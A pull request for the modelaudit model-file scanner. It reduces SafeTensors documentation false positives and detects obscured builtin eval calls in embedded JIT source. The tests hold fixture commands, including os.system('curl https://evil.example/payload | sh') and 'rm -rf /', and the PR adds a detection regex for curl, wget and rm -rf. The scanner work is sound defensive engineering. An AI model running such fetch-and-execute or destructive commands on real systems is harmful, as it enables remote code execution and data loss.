### PR TITLE
fix: avoid SafeTensors documentation false positives

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -44,6 +44,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - inspect nested PMML extension attributes for code-shaped execution indicators
 - detect statically obscured high-risk calls in TorchServe handler source
 - avoid classifying SafeTensors documentation examples as executable metadata payloads
+- detect statically obscured builtin execution calls in embedded JIT source analysis
 
 ## [0.2.45](https://github.com/promptfoo/modelaudit/compare/v0.2.44...v0.2.45) (2026-05-03)
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -43,6 +43,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - detect high-risk Python archive-member calls dispatched through static namespace and attribute lookup indirection
 - inspect nested PMML extension attributes for code-shaped execution indicators
 - detect statically obscured high-risk calls in TorchServe handler source
+- avoid classifying SafeTensors documentation examples as executable metadata payloads
 
 ## [0.2.45](https://github.com/promptfoo/modelaudit/compare/v0.2.44...v0.2.45) (2026-05-03)
 

--- a/modelaudit/detectors/jit_script.py
+++ b/modelaudit/detectors/jit_script.py
@@ -129,6 +129,80 @@ _DANGEROUS_IMPORT_PATTERNS = {
     dangerous_import: _compile_dangerous_import_patterns(dangerous_import) for dangerous_import in DANGEROUS_IMPORTS
 }
 
+_MAX_STATIC_BUILTIN_NAME_LENGTH = 128
+_MAX_STATIC_BUILTIN_NAME_NODES = 31
+
+
+def _resolve_static_string(node: ast.AST) -> str | None:
+    """Resolve a small constant-string expression without executing code."""
+    pending = [node]
+    parts: list[str] = []
+    visited = 0
+    total_length = 0
+
+    while pending:
+        current = pending.pop()
+        visited += 1
+        if visited > _MAX_STATIC_BUILTIN_NAME_NODES:
+            return None
+
+        if isinstance(current, ast.Constant) and isinstance(current.value, str):
+            parts.append(current.value)
+            total_length += len(current.value)
+            if total_length > _MAX_STATIC_BUILTIN_NAME_LENGTH:
+                return None
+        elif isinstance(current, ast.BinOp) and isinstance(current.op, ast.Add):
+            pending.extend((current.right, current.left))
+        else:
+            return None
+
+    return "".join(parts)
+
+
+def _is_builtins_namespace(node: ast.AST) -> bool:
+    """Return whether a node identifies Python's implicit builtins namespace."""
+    return (isinstance(node, ast.Name) and node.id == "__builtins__") or (
+        isinstance(node, ast.Attribute)
+        and node.attr == "__dict__"
+        and isinstance(node.value, ast.Name)
+        and node.value.id == "__builtins__"
+    )
+
+
+def _resolve_dangerous_builtin_reference(node: ast.AST) -> str | None:
+    """Resolve statically addressed dangerous builtin call targets."""
+    if isinstance(node, ast.Name):
+        return node.id if node.id in DANGEROUS_BUILTINS else None
+
+    if isinstance(node, ast.Attribute) and _is_builtins_namespace(node.value):
+        return node.attr if node.attr in DANGEROUS_BUILTINS else None
+
+    if isinstance(node, ast.Subscript) and _is_builtins_namespace(node.value):
+        name = _resolve_static_string(node.slice)
+        return name if name in DANGEROUS_BUILTINS else None
+
+    if not isinstance(node, ast.Call):
+        return None
+
+    lookup_name: ast.AST | None = None
+    if isinstance(node.func, ast.Name) and node.func.id == "getattr" and len(node.args) >= 2:
+        if _is_builtins_namespace(node.args[0]):
+            lookup_name = node.args[1]
+    elif (
+        isinstance(node.func, ast.Attribute)
+        and node.func.attr in {"get", "__getitem__"}
+        and _is_builtins_namespace(node.func.value)
+        and node.args
+    ):
+        lookup_name = node.args[0]
+
+    if lookup_name is None:
+        return None
+
+    name = _resolve_static_string(lookup_name)
+    return name if name in DANGEROUS_BUILTINS else None
+
+
 # Patterns that indicate code execution attempts
 CODE_EXECUTION_PATTERNS = [
     # Direct execution patterns
@@ -216,7 +290,7 @@ class JITScriptDetector:
                 if node.module and is_dangerous_import(node.module):
                     return True
             elif isinstance(node, ast.Call):
-                if isinstance(node.func, ast.Name) and node.func.id in DANGEROUS_BUILTINS:
+                if _resolve_dangerous_builtin_reference(node.func) is not None:
                     return True
 
                 operation = dotted_name(node.func)
@@ -664,10 +738,11 @@ class JITScriptDetector:
 
             def visit_Call(self, node: ast.Call) -> None:
                 # Check for dangerous function calls
-                if isinstance(node.func, ast.Name) and node.func.id in DANGEROUS_BUILTINS:
+                dangerous_builtin = _resolve_dangerous_builtin_reference(node.func)
+                if dangerous_builtin is not None:
                     self.findings.append(
                         create_jit_finding(
-                            message=f"AST analysis: Dangerous function call '{node.func.id}'",
+                            message=f"AST analysis: Dangerous function call '{dangerous_builtin}'",
                             severity="CRITICAL",
                             context=context,
                             pattern=None,
@@ -677,7 +752,7 @@ class JITScriptDetector:
                             code_snippet=None,
                             type="ast_dangerous_call",
                             operation=None,
-                            builtin=node.func.id,
+                            builtin=dangerous_builtin,
                             import_=None,
                         )
                     )

--- a/modelaudit/scanners/safetensors_scanner.py
+++ b/modelaudit/scanners/safetensors_scanner.py
@@ -34,6 +34,36 @@ MAX_HEADER_BYTES = 16 * 1024 * 1024
 SAFETENSORS_HEADER_INCONCLUSIVE_REASON = "safetensors_header_validation_failed"
 SAFETENSORS_STRUCTURE_INCONCLUSIVE_REASON = "safetensors_structure_validation_failed"
 SAFETENSORS_HEADER_LIMIT_INCONCLUSIVE_REASON = "safetensors_header_size_limit_exceeded"
+_DOCUMENTATION_METADATA_KEYS = {
+    "citation",
+    "comment",
+    "comments",
+    "description",
+    "doc",
+    "docs",
+    "documentation",
+    "help",
+    "license",
+    "model_card",
+    "note",
+    "notes",
+    "readme",
+}
+_DOCUMENTATION_LINE_PREFIXES = (
+    "#",
+    "//",
+    "/*",
+    "* ",
+    "- ",
+    "```",
+    "avoid ",
+    "do not ",
+    "example",
+    "never ",
+    "note:",
+    "security note:",
+    "warning:",
+)
 
 
 class SafeTensorsScanner(BaseScanner):
@@ -453,7 +483,7 @@ class SafeTensorsScanner(BaseScanner):
                                 ),
                             )
 
-                        if isinstance(value, str):
+                        if isinstance(value, str) and not self._is_primarily_documentation_metadata(str(key), value):
                             lower_val = value.lower()
 
                             # Check for simple code-like patterns
@@ -576,11 +606,43 @@ class SafeTensorsScanner(BaseScanner):
                         },
                     )
 
+    @staticmethod
+    def _is_primarily_documentation_metadata(key: str, value: str) -> bool:
+        """Return True for documentation-scoped, majority narrative metadata."""
+        normalized_key = key.strip().lower().replace("-", "_")
+        if normalized_key not in _DOCUMENTATION_METADATA_KEYS:
+            return False
+
+        lines = [line.strip() for line in value.splitlines() if line.strip()]
+        if not lines:
+            return False
+
+        doc_line_count = 0
+        for line in lines:
+            lowered = line.lower()
+            if lowered.startswith(_DOCUMENTATION_LINE_PREFIXES):
+                doc_line_count += 1
+                continue
+            if (
+                len(line.split()) >= 6
+                and not lowered.startswith(("from ", "import "))
+                and not re.match(r"(?:return\s+)?[A-Za-z_][\w.]*\s*\(", line)
+            ):
+                doc_line_count += 1
+
+        return doc_line_count > len(lines) / 2
+
     def _analyze_metadata_content(self, metadata: dict[str, Any], result: ScanResult, path: str) -> None:
         """Analyze SafeTensors metadata content for injection attacks"""
 
         # Convert metadata to string for pattern analysis
         metadata_str = json.dumps(metadata, indent=2, ensure_ascii=False)
+        executable_metadata = {
+            key: value
+            for key, value in metadata.items()
+            if not (isinstance(value, str) and self._is_primarily_documentation_metadata(str(key), value))
+        }
+        executable_metadata_str = json.dumps(executable_metadata, indent=2, ensure_ascii=False)
 
         # XSS/HTML injection patterns
         html_patterns = [
@@ -630,7 +692,7 @@ class SafeTensorsScanner(BaseScanner):
         ]
 
         for pattern in code_patterns:
-            matches = re.findall(pattern, metadata_str, re.IGNORECASE)
+            matches = re.findall(pattern, executable_metadata_str, re.IGNORECASE)
             if matches:
                 result.add_check(
                     name="SafeTensors Code Injection Detection",

--- a/modelaudit/scanners/safetensors_scanner.py
+++ b/modelaudit/scanners/safetensors_scanner.py
@@ -64,6 +64,10 @@ _DOCUMENTATION_LINE_PREFIXES = (
     "security note:",
     "warning:",
 )
+_EXECUTABLE_METADATA_LINE_RE = re.compile(
+    r"(?i)^(?:from\s+|import\s+|(?:return\s+)?[A-Za-z_][\w.]*\s*\(|curl\s|wget\s|rm\s+-rf|chmod\s|"
+    r"bash\s|sh\s|python(?:\d+(?:\.\d+)*)?\s|node\s|powershell\s|pwsh\s)"
+)
 
 
 class SafeTensorsScanner(BaseScanner):
@@ -483,8 +487,12 @@ class SafeTensorsScanner(BaseScanner):
                                 ),
                             )
 
-                        if isinstance(value, str) and not self._is_primarily_documentation_metadata(str(key), value):
-                            lower_val = value.lower()
+                        if isinstance(value, str):
+                            executable_value = self._metadata_value_for_executable_analysis(str(key), value)
+                            if not executable_value:
+                                continue
+
+                            lower_val = executable_value.lower()
 
                             # Check for simple code-like patterns
                             if any(s in lower_val for s in ["import ", "#!/"]):
@@ -504,7 +512,7 @@ class SafeTensorsScanner(BaseScanner):
 
                             # Check for regex-based suspicious patterns (independent of above check)
                             for pattern in SUSPICIOUS_METADATA_PATTERNS:
-                                if re.search(pattern, value):
+                                if re.search(pattern, executable_value):
                                     result.add_check(
                                         name="Metadata Pattern Check",
                                         passed=False,
@@ -607,30 +615,42 @@ class SafeTensorsScanner(BaseScanner):
                     )
 
     @staticmethod
-    def _is_primarily_documentation_metadata(key: str, value: str) -> bool:
-        """Return True for documentation-scoped, majority narrative metadata."""
+    def _is_documentation_metadata_key(key: str) -> bool:
         normalized_key = key.strip().lower().replace("-", "_")
-        if normalized_key not in _DOCUMENTATION_METADATA_KEYS:
-            return False
+        return normalized_key in _DOCUMENTATION_METADATA_KEYS
 
-        lines = [line.strip() for line in value.splitlines() if line.strip()]
-        if not lines:
+    @staticmethod
+    def _is_documentation_metadata_line(line: str) -> bool:
+        """Return True for a single documentation/comment line that can be ignored."""
+        lowered = line.lower()
+        if lowered.startswith(_DOCUMENTATION_LINE_PREFIXES):
+            return True
+        if _EXECUTABLE_METADATA_LINE_RE.search(line):
             return False
+        return len(line.split()) >= 6
 
-        doc_line_count = 0
-        for line in lines:
-            lowered = line.lower()
-            if lowered.startswith(_DOCUMENTATION_LINE_PREFIXES):
-                doc_line_count += 1
+    @classmethod
+    def _metadata_value_for_executable_analysis(cls, key: str, value: str) -> str:
+        """Return non-documentation lines from metadata values that may contain executable content."""
+        if not cls._is_documentation_metadata_key(key):
+            return value
+
+        executable_lines: list[str] = []
+        in_fenced_block = False
+        for line in value.splitlines():
+            stripped = line.strip()
+            if not stripped:
                 continue
-            if (
-                len(line.split()) >= 6
-                and not lowered.startswith(("from ", "import "))
-                and not re.match(r"(?:return\s+)?[A-Za-z_][\w.]*\s*\(", line)
-            ):
-                doc_line_count += 1
+            if stripped.startswith("```"):
+                in_fenced_block = not in_fenced_block
+                continue
+            if in_fenced_block:
+                continue
+            if cls._is_documentation_metadata_line(stripped):
+                continue
+            executable_lines.append(stripped)
 
-        return doc_line_count > len(lines) / 2
+        return "\n".join(executable_lines)
 
     def _analyze_metadata_content(self, metadata: dict[str, Any], result: ScanResult, path: str) -> None:
         """Analyze SafeTensors metadata content for injection attacks"""
@@ -638,9 +658,8 @@ class SafeTensorsScanner(BaseScanner):
         # Convert metadata to string for pattern analysis
         metadata_str = json.dumps(metadata, indent=2, ensure_ascii=False)
         executable_metadata = {
-            key: value
+            key: self._metadata_value_for_executable_analysis(str(key), value) if isinstance(value, str) else value
             for key, value in metadata.items()
-            if not (isinstance(value, str) and self._is_primarily_documentation_metadata(str(key), value))
         }
         executable_metadata_str = json.dumps(executable_metadata, indent=2, ensure_ascii=False)
 

--- a/tests/detectors/test_jit_script_detector.py
+++ b/tests/detectors/test_jit_script_detector.py
@@ -236,6 +236,32 @@ class TestJITScriptDetector:
 
         assert any(f.type == "dangerous_import" and f.import_ == "os" for f in findings)
 
+    @pytest.mark.parametrize(
+        "source",
+        [
+            b"getattr(__builtins__, 'eval')('1 + 1')\n",
+            b"__builtins__['eval']('1 + 1')\n",
+            b"getattr(__builtins__, 'ev' + 'al')('1 + 1')\n",
+            b"__builtins__.__dict__['ev' + 'al']('1 + 1')\n",
+            b"__builtins__.__dict__.get('ev' + 'al')('1 + 1')\n",
+            b"__builtins__.__dict__.__getitem__('eval')('1 + 1')\n",
+        ],
+    )
+    def test_scan_model_detects_unmarked_static_builtin_indirection(self, source: bytes) -> None:
+        detector = JITScriptDetector()
+
+        findings = detector.scan_model(source, "pytorch", "payload.bin")
+
+        assert any(f.type == "ast_dangerous_call" and f.builtin == "eval" for f in findings)
+
+    def test_scan_model_ignores_ordinary_static_callback_mapping(self) -> None:
+        detector = JITScriptDetector()
+        source = b"callbacks = {'eval': len}\ncallbacks['eval']([])\n"
+
+        findings = detector.scan_model(source, "pytorch", "payload.bin")
+
+        assert findings == []
+
     def test_scan_model_detects_late_unmarked_module_scope_python_source(self) -> None:
         detector = JITScriptDetector()
         data = b"# pad\n" * 200000 + b"import os\nos.system('id')\n"

--- a/tests/scanners/test_pytorch_zip_scanner.py
+++ b/tests/scanners/test_pytorch_zip_scanner.py
@@ -1034,6 +1034,51 @@ def test_pytorch_zip_scans_unmarked_python_blobs_in_archive_data(tmp_path: Path)
     assert any(check.location == f"{zip_path}:archive/data/payload.bin" for check in jit_failures)
 
 
+@pytest.mark.parametrize(
+    "payload",
+    [
+        b"getattr(__builtins__, 'eval')('1 + 1')\n",
+        b"__builtins__['ev' + 'al']('1 + 1')\n",
+        b"__builtins__.__dict__.get('eval')('1 + 1')\n",
+    ],
+)
+def test_pytorch_zip_scans_static_builtin_indirection_in_archive_data(tmp_path: Path, payload: bytes) -> None:
+    """A disguised source member using the builtin namespace still receives JIT analysis."""
+    zip_path = tmp_path / "model.pt"
+    with zipfile.ZipFile(zip_path, "w") as zipf:
+        zipf.writestr("archive/version", "3")
+        zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]}))
+        zipf.writestr("archive/data/payload.bin", payload)
+
+    result = PyTorchZipScanner().scan(str(zip_path))
+
+    jit_failures = [
+        check
+        for check in result.checks
+        if check.name == "JIT/Script Code Execution Detection" and check.status == CheckStatus.FAILED
+    ]
+    assert any(
+        check.location == f"{zip_path}:archive/data/payload.bin" and "Dangerous function call 'eval'" in check.message
+        for check in jit_failures
+    )
+
+
+def test_pytorch_zip_ignores_ordinary_callback_mapping_in_archive_data(tmp_path: Path) -> None:
+    """An ordinary application lookup with a builtin-shaped key must remain benign."""
+    zip_path = tmp_path / "model.pt"
+    with zipfile.ZipFile(zip_path, "w") as zipf:
+        zipf.writestr("archive/version", "3")
+        zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]}))
+        zipf.writestr("archive/data/payload.bin", b"callbacks = {'eval': len}\ncallbacks['eval']([])\n")
+
+    result = PyTorchZipScanner().scan(str(zip_path))
+
+    assert not any(
+        check.name == "JIT/Script Code Execution Detection" and check.status == CheckStatus.FAILED
+        for check in result.checks
+    )
+
+
 def test_pytorch_zip_ignores_non_source_eval_text_in_archive_data(tmp_path: Path) -> None:
     """Plain payload text containing a dangerous substring must not become a JIT false positive."""
     zip_path = tmp_path / "model.pt"

--- a/tests/scanners/test_safetensors_scanner.py
+++ b/tests/scanners/test_safetensors_scanner.py
@@ -461,6 +461,53 @@ def test_unicode_metadata_is_not_code_injection(tmp_path: Path) -> None:
     assert [issue for issue in result.issues if issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL}] == []
 
 
+@pytest.mark.parametrize(
+    ("key", "value"),
+    [
+        ("description", "Security note: never invoke os.system('rm -rf /') or eval(user_input) in model hooks."),
+        (
+            "README",
+            "Example of unsafe code to avoid:\n```python\nimport os\nos.system('rm -rf /')\n```\nDo not execute this.",
+        ),
+    ],
+)
+def test_safetensors_documentation_examples_are_not_code_injection(tmp_path: Path, key: str, value: str) -> None:
+    file_path = tmp_path / "documented_security_example.safetensors"
+    data = {"t": np.arange(5, dtype=np.float32)}
+    save_file(data, str(file_path), metadata={key: value})
+
+    result = SafeTensorsScanner().scan(str(file_path))
+
+    assert result.success is True
+    assert not [
+        check
+        for check in result.checks
+        if check.name
+        in {
+            "SafeTensors Code Injection Detection",
+            "Metadata Code Pattern Check",
+            "Metadata Pattern Check",
+        }
+        and check.status == CheckStatus.FAILED
+    ]
+
+
+def test_safetensors_documentation_guard_does_not_hide_executable_metadata(tmp_path: Path) -> None:
+    file_path = tmp_path / "comment_padded_payload.safetensors"
+    data = {"t": np.arange(5, dtype=np.float32)}
+    metadata = {"description": "# Security note\nos.system('curl https://evil.example/payload | sh')"}
+    save_file(data, str(file_path), metadata=metadata)
+
+    result = SafeTensorsScanner().scan(str(file_path))
+
+    assert any(
+        check.name == "SafeTensors Code Injection Detection"
+        and check.status == CheckStatus.FAILED
+        and check.severity == IssueSeverity.CRITICAL
+        for check in result.checks
+    )
+
+
 def test_literal_unicode_escape_metadata_still_flags_code_injection(tmp_path: Path) -> None:
     file_path = tmp_path / "escaped_payload_metadata.safetensors"
     data = {"t": np.arange(5, dtype=np.float32)}

--- a/tests/scanners/test_safetensors_scanner.py
+++ b/tests/scanners/test_safetensors_scanner.py
@@ -495,7 +495,13 @@ def test_safetensors_documentation_examples_are_not_code_injection(tmp_path: Pat
 def test_safetensors_documentation_guard_does_not_hide_executable_metadata(tmp_path: Path) -> None:
     file_path = tmp_path / "comment_padded_payload.safetensors"
     data = {"t": np.arange(5, dtype=np.float32)}
-    metadata = {"description": "# Security note\nos.system('curl https://evil.example/payload | sh')"}
+    metadata = {
+        "description": (
+            "# Security note\n"
+            "# The following line must not run during model loading.\n"
+            "os.system('curl https://evil.example/payload | sh')"
+        )
+    }
     save_file(data, str(file_path), metadata=metadata)
 
     result = SafeTensorsScanner().scan(str(file_path))
@@ -504,6 +510,22 @@ def test_safetensors_documentation_guard_does_not_hide_executable_metadata(tmp_p
         check.name == "SafeTensors Code Injection Detection"
         and check.status == CheckStatus.FAILED
         and check.severity == IssueSeverity.CRITICAL
+        for check in result.checks
+    )
+
+
+def test_safetensors_documentation_guard_does_not_hide_shell_metadata(tmp_path: Path) -> None:
+    file_path = tmp_path / "shell_payload_metadata.safetensors"
+    data = {"t": np.arange(5, dtype=np.float32)}
+    metadata = {"description": "curl https://evil.example/payload | sh --arg one two"}
+    save_file(data, str(file_path), metadata=metadata)
+
+    result = SafeTensorsScanner().scan(str(file_path))
+
+    assert any(
+        check.name == "Metadata Pattern Check"
+        and check.status == CheckStatus.FAILED
+        and check.details["pattern"] == r"https?://"
         for check in result.checks
     )
 


### PR DESCRIPTION
## What changed

- add a SafeTensors-local majority-line documentation guard for known narrative metadata fields such as `description` and `README`
- exclude only documentation-shaped values from executable/code-like and suspicious shell/URL metadata indicators
- keep XSS/HTML, path traversal, and credential inspection active for all metadata fields
- add benign documentation-example coverage and a malicious single-comment bypass regression
- record the false-positive repair in the unreleased changelog

## Why

SafeTensors metadata is often used for descriptions and model-card notes. Before this change, a valid model containing narrative guidance such as:

```text
Security note: never invoke os.system('rm -rf /') or eval(user_input) in model hooks.
```

was reported as critical `SafeTensors Code Injection Detection` and produced aggregate exit code `1`. A fenced `README` example documenting code users should avoid was reported the same way.

## Impact and root cause

The scanner searched the JSON rendering of all metadata for execution tokens without distinguishing a narrative documentation field from an executable-looking payload field. That treated documentation about security as evidence of code injection.

The new guard is deliberately constrained: the metadata key must be documentation-scoped and more than half of its non-empty lines must be narrative/comment/example lines. It is applied only to executable and suspicious code/shell/URL marker checks. A payload value under `payload` remains critical, `description` containing only one comment line followed by `os.system(...)` remains critical, and documentation text containing `<script>` remains a critical XSS/HTML finding.

Reproduction after the change:

- narrative `description` example: exit code `0`
- fenced `README` unsafe-code example: exit code `0`
- executable-looking `payload` metadata: exit code `1`
- single-comment-prefixed executable content in `description`: exit code `1`
- documentation-scoped `<script>` content: exit code `1`

## Validation

- `env -u UV_EXCLUDE_NEWER -u VIRTUAL_ENV uv --no-config run --locked ruff format modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- `env -u UV_EXCLUDE_NEWER -u VIRTUAL_ENV uv --no-config run --locked ruff check --fix modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- `env -u UV_EXCLUDE_NEWER -u VIRTUAL_ENV uv --no-config run --locked mypy modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- `env -u UV_EXCLUDE_NEWER -u VIRTUAL_ENV PROMPTFOO_DISABLE_TELEMETRY=1 uv --no-config run --locked pytest -n auto -m "not slow and not integration" --maxfail=1` (`4924 passed, 972 skipped`)
- focused SafeTensors suite (`33 passed`)
- direct aggregate exit-code reproduction for two benign examples and three retained malicious/XSS controls

Stacked on #1342.